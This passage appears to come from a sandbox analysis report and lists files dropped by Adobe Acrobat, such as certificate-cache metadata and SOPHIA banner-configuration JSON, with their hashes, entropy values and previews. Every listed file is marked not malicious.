                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7464849065063075
                                          Encrypted:false
                                          SSDEEP:3:kkFkl4DM+kNllXfllXlE/HT8ka/hlltNNX8RolJuRdxLlGB9lQRYwpDdt:kKhD1T877NMa8RdWBwRd
                                          MD5:EC617266FB2A00938E84E772B592B42D
                                          SHA1:8292B50D2DEC5EB94C7B5501A2C57AE7A03EEF11
                                          SHA-256:4090C373E7A6829541D85B7236BD00B467A48096EEC2BF9D94B3AE9EE5E8BBA3
                                          SHA-512:0BF03540850473F9D36C465340D7AFA78995A8032CB600E04DB9004AC381DFC02132F79E9D916DCE2F70F6EF2CF7CDA2D1877248652526F572F080CD50BDC244
                                          Malicious:false
                                          Preview:p...... ........Kf..g[..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):328
                                          Entropy (8bit):3.2539954282295116
                                          Encrypted:false
                                          SSDEEP:6:kKqT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:nDImsLNkPlE99SNxAhUe/3
                                          MD5:0EC2FDF81EE3D769DE9ACA6028632F5D
                                          SHA1:6CEA27B445E11A6FEE0AFCFE28A1DD73D52D0EA4
                                          SHA-256:36D2F1C6F3DBAE271B70CC8C964680F567676663B261B2544C66239405EBCF5D
                                          SHA-512:DACF1C249B92C37956B05CDD4585BD39BF96E63ED51058E1E562F3A0AF892644F7DD28FBAC1CAE03D75A268174AD624369A46644562D811BE319F646F650D167
                                          Malicious:false
                                          Preview:p...... ........,.^.g[..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):295
                                          Entropy (8bit):5.342978084772167
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJM3g98kUwPeUkwRe9:YvXKXasJpH0cORsGMbLUkee9
                                          MD5:5AEA62F9C38144904730D2C65664A994
                                          SHA1:98FB27219B1000690670DB8756F2D4DB12E5AAE1
                                          SHA-256:7FE0EDB1854860CDEFA1CC68709D641A44A8E091BDDA06505365D69F962C96D7
                                          SHA-512:1088CACE4AA92F289FB5EDC7A9AD692AE7B6F6818F00ACFA5D7436E0144EEBBCE8DCC2CFCE5B8BE5D7F0853ED29570C7545F3B191AC07010AFF2715ECC116F50
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):294
                                          Entropy (8bit):5.29360488294335
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfBoTfXpnrPeUkwRe9:YvXKXasJpH0cORsGWTfXcUkee9
                                          MD5:AA04B30BA6E0FE3411259BE84E692CB2
                                          SHA1:5C4F310FD8C08D00E92FC5FA2AF2476078DA2A5F
                                          SHA-256:E371125D506D1E4007BB979B345C25718D1ABF384D1588217713410DD8BA0B75
                                          SHA-512:896336777105A18A36201C88AFFF49525D37C79B5384328BF9D3BFC800EFDCCCA7BE6A37415031E310D0D97A652ECA868562AA9A4B19DB1D6F0D9F41F217A60B
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):294
                                          Entropy (8bit):5.272599918338425
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfBD2G6UpnrPeUkwRe9:YvXKXasJpH0cORsGR22cUkee9
                                          MD5:6453DB71082F10DA6293FE6323280096
                                          SHA1:3AE3D1901ED74D8200F09409CB7D69F2CDB52E44
                                          SHA-256:B1401E7E9AB395E0524EAD00CDDCFF02DE8A156D503312AC23E976D3FC5F8947
                                          SHA-512:F68667F5E9834CE15E82A210CE5FD8AD7870D6C7700263F8CFD30577A3466308D45CF73A34CE4AE9BFFB1BABC8761A73C0486A2ABC6B19EA9FA4028A60CFFCCD
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):285
                                          Entropy (8bit):5.322285386697682
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfPmwrPeUkwRe9:YvXKXasJpH0cORsGH56Ukee9
                                          MD5:ADB54A7009DB9A80B1F2496F8B4BE975
                                          SHA1:52798C25E8FEC7E8D6AC326BDDEF58C3FDC56556
                                          SHA-256:2FD132BEC84D5AEC3186E21E4952FDDA3075651FDA171403117D5591D7F801EA
                                          SHA-512:FAF314F246C645BFEE5764B3E1389A2ACA47D3DA36BF0A186794D487FE2748529CF83BB77A3F19574080A63B079DF82F423B1B83FA16FE31048E0F64B35AAF7E
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):1123
                                          Entropy (8bit):5.6926768616400425
                                          Encrypted:false
                                          SSDEEP:24:Yv6XDp5WpLgE9cQx8LennAvzBvkn0RCmK8czOCCS1w:Yv06hgy6SAFv5Ah8cv/1w
                                          MD5:36F9962099673451FD475FE9498A7816
                                          SHA1:D669BD53B3F80878EF80FF37E6B565CC9D7A03B0
                                          SHA-256:0D9E7F7878321B66E16A1FD863026FB06C1FF7C998423060789AA612D56BEB1B
                                          SHA-512:1958E621D9EB74ED0FCA59854DFECA656915A151C71E5F6B89706A6971BA9213B2290A4A2595176A103290C6D02F5C447D3E19F5C25F87C9B9852703D5B2475E
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.272074662629678
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf8dPeUkwRe9:YvXKXasJpH0cORsGU8Ukee9
                                          MD5:798EC9B023582735DCC6BA554844547A
                                          SHA1:E8F8485FE17C2B5F257C456DD712DD413D5F58E4
                                          SHA-256:480B1F740BEF8D259513A89F771D431A7A0D70D16A9C1B400B9F90F3A4B09C3C
                                          SHA-512:8845AA24C494FC57479C77A3410BE90ADF7B300F1C94B49EA09B64EC37BC54A071EDE80047CE070D91CF5E6364A6BB6BC3CDB26D79FB313A89A45C2E35A09E60
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):292
                                          Entropy (8bit):5.27501381892357
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfQ1rPeUkwRe9:YvXKXasJpH0cORsGY16Ukee9
                                          MD5:0BFC3F29550AF4E8B48294249F4DB4F7
                                          SHA1:A7354FCE1F5220DDB18C817072572C68005DD9B1
                                          SHA-256:A2A21FD40172E8F7320BCCAB998C151F3735B1E54CE678F4948D64C57B291593
                                          SHA-512:F8F438916510FC8506959FEA21A174102032BEC3599BFAB6EFD38ADF17A778E3A5922847E116966ECE19C9238CB2D99C06410E3CBF19D87B1FEB2D8841ECCCFB
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.28205916353848
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfFldPeUkwRe9:YvXKXasJpH0cORsGz8Ukee9
                                          MD5:FB0B1FB12D3C0399E49ADA9F03EC02F2
                                          SHA1:042941E693AC0A95DD7E1CA596289C88ED173394
                                          SHA-256:5050D63876CCF65CC187CE43B644976076332CF67FE1E0CB34175AC5C4D5ECEE
                                          SHA-512:F7B6F7740E7E3D7B4BCF899AD383CE82E14670171B598A4BDD83090881CA184C90BBB0ADB6FE3562321FF040CF8235A3D6301FE0C1B486234FFBDC02672C2720
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):295
                                          Entropy (8bit):5.298829334937266
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfzdPeUkwRe9:YvXKXasJpH0cORsGb8Ukee9
                                          MD5:2861E10C5A57094038B5CF930B42000E
                                          SHA1:8E065340ED941F40B1A0B8C0A337882B743C277A
                                          SHA-256:08709653814459280AB3EDF3D2BE8D0DBE9A37F99107879CD9601A0FD493633C
                                          SHA-512:E376A7ABF428DC87E3845CC15C1F694410ED16CA0211A444521F7023CD8DDC5177E81C921905EDC2D5CEB6E41B3B3C4CA2149CBB1DC1350182B05D41A1251C39
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):289
                                          Entropy (8bit):5.279046760354939
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfYdPeUkwRe9:YvXKXasJpH0cORsGg8Ukee9
                                          MD5:FB70A55576A2E9272014F2D1AFD28DB1
                                          SHA1:A3519576C11D7688F6FD9B580ECE9914BCEECC16
                                          SHA-256:A04C1175C7D60CE4D3CF7052CA337D01D64D43EAD5AEDAB4E7C7863718A0A758
                                          SHA-512:4F040A71AAABB970769B58C100DA8B13A6A88125D944C2175FE7363F1DE8CD3D96FF82A0D2B2ECA4A713F66C065DDFBAAC3F078BF1D19F3C3D9C59030DD6498F
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):284
                                          Entropy (8bit):5.26502722904128
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf+dPeUkwRe9:YvXKXasJpH0cORsG28Ukee9
                                          MD5:DA54944971A381B678727531D5E3204F
                                          SHA1:A7132CCC1A4A8E0A032D0250786476D2CEAFE9CE
                                          SHA-256:9F38C7054BA1BD5D10738C0D8030265CFD394BA40F08C6FC0C95DF3D0CAF44D3
                                          SHA-512:EDF18D92FA5B557DCC83593DCFD36B268979D263E46F39A75C7770271EDA1442889D530398B6CAF974144C429996D6A95EDE8BDFDB704C7F79C31230492C6CAF
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):291
                                          Entropy (8bit):5.262737866548701
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfbPtdPeUkwRe9:YvXKXasJpH0cORsGDV8Ukee9
                                          MD5:5DB4D863FD8822D6D04F458F330BE527
                                          SHA1:07CEAE47DF4EB93EFE3339BFF1B456BE462FEF89
                                          SHA-256:A71403E2F37A2EE5E984FCD17223EB12C639A76C881E17E42EA540D7CD39132A
                                          SHA-512:F0C9AEEDE66570D9BEDA049C423558F642EDED64BEB76A12895CB2E82C98A3FCCBFCEAAD4890FD5888BEABAA4F7D2AF33E3D818CC5B82E1BB1122181ADD1F619
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):287
                                          Entropy (8bit):5.265829162735097
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf21rPeUkwRe9:YvXKXasJpH0cORsG+16Ukee9
                                          MD5:519B3F2F1619ED5B9F81C237386E8B90
                                          SHA1:B1C2F147A988F30D1B385FF07E6FCE2CFDD0F3F0
                                          SHA-256:EFC7A6ED14A39DB5C7158C63D3E0C40CA4DF7B87F0166870A90E1E77B7582CFF
                                          SHA-512:4BDA2914CC6761B5454FC12C8E4F4E3692C9E9C3F146BB837CD1902CE2F97A2EECEE3B0307C8342BB1DF6159A93F30B609BC21301F73F678193C60DCD1A2D715
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):1090
                                          Entropy (8bit):5.669094370421339
                                          Encrypted:false
                                          SSDEEP:24:Yv6XDp5KamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS1w:Yv0oBgkDMUJUAh8cvM1w
                                          MD5:7770FF1C86F0AE88E72C168F1FC2A579
                                          SHA1:EB87B805C93F103247A3D6FE5CA054ABC9089732
                                          SHA-256:FA8381877F436B72F8EB51B33F448B22CCC51BE8EDA451808E79095C73953C53
                                          SHA-512:6B8CCCE0CE29B143D151A5268CCB15DF87D5F9A72F6E7684D8E21AC9CA0D92829DDEE9F030678A344958D79176D272BED81DA6089BF014E070BD385B3AC35524
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):286
                                          Entropy (8bit):5.2426668674185075
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfshHHrPeUkwRe9:YvXKXasJpH0cORsGUUUkee9
                                          MD5:24DCAF5AAC39358A5075ABB243EE7D43
                                          SHA1:74ACF79C51F5BFAADDCE8C896497996223BF1B6E
                                          SHA-256:C5C06472728ABC033CB8ED7DCE0FAC31B4F15BF8EBA31D0E02F893F71FCB1F1F
                                          SHA-512:434A723F00F8187B7A92C9CBCB8FEC8BF84274D85DE035E088A389CE9CC22EC5335D8FCEB1EA994F9FD063ECC0461CF87EA0896DE0FFB317C29E36C47F693417
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):282
                                          Entropy (8bit):5.254112654592129
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJTqgFCrPeUkwRe9:YvXKXasJpH0cORsGTq16Ukee9
                                          MD5:390C44091652F13781486928FDF3D2F3
                                          SHA1:9744BB6E2AC674D79E1C8A34DFF7F62CAAA42FF1
                                          SHA-256:0BA31048DD8F6726F5A2E36DC77113D85FD7714FC771AD5A0173EC0D1545F37B
                                          SHA-512:BD8276BE4373F4BB3B0EF3DAD5A36BB6F233CDFBF0E5876EB5D83D2583E4656274E6B5E742E9BD19FFE2D98440828E13A261C0141679555774DA6F5B9B521424
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4
                                          Entropy (8bit):0.8112781244591328
                                          Encrypted:false
                                          SSDEEP:3:e:e
                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                          Malicious:false
                                          Preview:....

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):2814
                                          Entropy (8bit):5.14026899327547
                                          Encrypted:false
                                          SSDEEP:48:Y3P/dGBHq6adVJUAxmNiwTOOkWOj8zj10PX6e9MLBLLMt:TZq6skMui2OO1kWg
                                          MD5:B148875F7529E1EF1B2FCF67CBB9FAD5
                                          SHA1:7CCCB7FCB8279D03814FEEAF259B67129EA39783
                                          SHA-256:0E60224EACBCC2385A1CDE7617F5993E6BEA710CB5D95F6300600F0FC7FEEABC
                                          SHA-512:967766440F2C2544FD4D2D8D7A8C4C295EDDC707222B58C14317E2066815753A06F2D238CBE9D1819BACA74CE6B6720DEFD8523B1D5D9DECF679FD4D32D941E4
                                          Malicious:false
